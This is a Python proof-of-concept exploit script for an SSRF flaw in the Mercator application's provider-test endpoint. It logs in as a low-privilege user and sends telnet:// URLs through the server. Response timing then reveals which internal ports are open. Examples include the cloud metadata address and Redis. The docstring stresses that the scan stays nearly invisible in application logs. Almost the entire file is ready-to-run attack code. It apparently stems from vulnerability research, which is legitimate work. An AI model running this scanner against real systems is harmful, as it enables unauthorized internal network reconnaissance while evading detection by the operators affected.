#!/usr/bin/env python3 """ Mercator SSRF Port Scanner — TCP port enumeration via the unvalidated `provider` URL of `ConfigurationController::testProvider`. Method ------ The vulnerable controller calls libcurl on the attacker-supplied URL with a 10-second timeout. By using the `telnet://` scheme, libcurl performs a plain TCP connection and waits for the server to speak first — sending no application-layer payload at all. Two observable outcomes: * TCP RST received quickly (~0.15 s) -> CLOSED port is not accepting connections * No reply within 10 seconds (~10 s) -> OPEN port accepted the TCP connection Because no HTTP, gopher, Redis or other protocol bytes are sent, the scan is essentially invisible to application-layer logs on the target — only the raw TCP handshake is visible. In rare environments a firewall that silently drops packets ("filter") will also produce OPEN; this is an acceptable ambiguity for enumeration purposes. Auth ---- Any account with the `configure` permission. By default Mercator grants this to the `User` role (`PermissionRoleTableSeeder.php`), so a regular low-privilege account is sufficient. Usage ----- ./bin/python3 ssrf_portscan.py \\ --base http://127.0.0.1:8000 \\ --user lowuser --password 'Lowuser123!' \\ --target 127.0.0.1 --ports 22,80,443,3306,6379,8000 # Port range ./bin/python3 ssrf_portscan.py ... --target 10.0.0.5 --ports 1-1024 # Explicit list of host:port (each entry MUST carry a port) ./bin/python3 ssrf_portscan.py ... --endpoints 169.254.169.254:80,10.0.0.5:6379 """ import argparse import re import sys import time import warnings # macOS system Python links LibreSSL; urllib3 v2 emits a one-time # NotOpenSSLWarning when imported. Purely cosmetic for this PoC — filter # it before `requests` pulls urllib3 in (disable_warnings() runs too late, # the warning fires at import time). warnings.filterwarnings("ignore", message=r"urllib3 v2 only supports OpenSSL") import requests import urllib3 urllib3.disable_warnings() LOGIN_TOKEN_RE = re.compile(r'name="_token"\s+value="([^"]+)"') CSRF_META_RE = re.compile(r'name="csrf-token"\s+content="([^"]+)"') # Threshold (seconds). Below = TCP RST received fast (CLOSED). Above = curl # hit its 10s timeout (OPEN/filtered). Local-loop RSTs round-trip <0.5s; we # leave a comfortable margin. OPEN_THRESHOLD = 8.0 # ── Shared scaffold (identical across the Mercator exploit scripts) ────────── def log(message): """Status banner — emitted on stderr so stdout stays pure result data.""" print(message, file=sys.stderr) def die(message): log(f"[!] {message}") sys.exit(1) def login(session, base, user, password): """Authenticate, print the login section, and return the CSRF token.""" r = session.get(f"{base}/login", timeout=10) m = LOGIN_TOKEN_RE.search(r.text) if not m: die("CSRF token not found on /login") r = session.post( f"{base}/login", data={"_token": m.group(1), "login": user, "password": password}, timeout=10, allow_redirects=True, ) if r.url.rstrip("/").endswith("/login"): die(f"authentication failed for '{user}'") m = CSRF_META_RE.search(r.text) or LOGIN_TOKEN_RE.search(r.text) if not m: die("CSRF token not found after login") csrf = m.group(1) log("[+] login") log(f" user : {user}") for c in session.cookies: log(f" cookie : {c.name}={c.value}") log(f" csrf token : {csrf}") return csrf # ── SSRF port scan ────────────────────────────────────────────────────────── def require_configure(session, base): """Confirm the account holds the `configure` permission.""" r = session.get(f"{base}/admin/config/parameters?tab=cve", timeout=10) if r.status_code == 403: die("account lacks the 'configure' permission") def probe(session, base, csrf, target): """Send one telnet:// probe. Return (state, elapsed_seconds).""" t0 = time.perf_counter() session.post( f"{base}/admin/config/parameters", data={ "_token": csrf, "_method": "PUT", "active_tab": "cve", "action": "test_provider", "provider": f"telnet://{target}#", }, allow_redirects=False, timeout=15, ) session.get(f"{base}/admin/config/parameters?tab=cve") elapsed = time.perf_counter() - t0 return ("OPEN" if elapsed > OPEN_THRESHOLD else "CLOSED"), elapsed def parse_ports(spec): out = [] try: for chunk in spec.split(","): chunk = chunk.strip() if not chunk: continue if "-" in chunk: a, b = chunk.split("-", 1) out.extend(range(int(a), int(b) + 1)) else: out.append(int(chunk)) except ValueError: die(f"invalid --ports spec {spec!r} (expected e.g. '22,80,443' or '1-1024')") seen = set() return [p for p in out if not (p in seen or seen.add(p))] def build_targets(args): if args.endpoints: out = [t.strip() for t in args.endpoints.split(",") if t.strip()] # telnet:// has no port -> libcurl falls back to 23, silently # mis-scanning. Refuse port-less endpoints rather than lie. bad = [t for t in out if ":" not in t.rsplit("]", 1)[-1]] if bad: die(f"--endpoints entries need an explicit ':port' -> {', '.join(bad)} " f"(use --target {bad[0]} --ports to scan a host)") return out if not args.target or not args.ports: die("need --endpoints, or --target + --ports") return [f"{args.target}:{p}" for p in parse_ports(args.ports)] def main(): ap = argparse.ArgumentParser( formatter_class=argparse.RawDescriptionHelpFormatter, description=__doc__) ap.add_argument("--base", default="http://127.0.0.1:8000", help="Mercator base URL") ap.add_argument("--user", required=True, help="account login") ap.add_argument("--password", required=True) ap.add_argument("--target", help="host scanned (combined with --ports)") ap.add_argument("--ports", help="port list/range, e.g. '22,80,443' or '1-1024'") ap.add_argument("--endpoints", help="explicit 'host:port,host:port,...' (each needs a port)") ap.add_argument("--delay", type=float, default=0.0, help="seconds to sleep between probes (default: 0)") args = ap.parse_args() targets = build_targets(args) session = requests.Session() session.verify = False csrf = login(session, args.base, args.user, args.password) require_configure(session, args.base) log(f"[*] scanning {len(targets)} target(s) via SSRF telnet probe") print(f"{'TARGET':<28} {'STATE':<8} TIME") print("-" * 50) for t in targets: try: state, elapsed = probe(session, args.base, csrf, t) except requests.RequestException as e: print(f"{t:<28} {'ERROR':<8} {e}") continue print(f"{t:<28} {state:<8} {elapsed:.2f}s") if args.delay > 0: time.sleep(args.delay) if __name__ == "__main__": try: main() except KeyboardInterrupt: die("interrupted") except requests.RequestException as e: die(f"could not reach Mercator: {e}")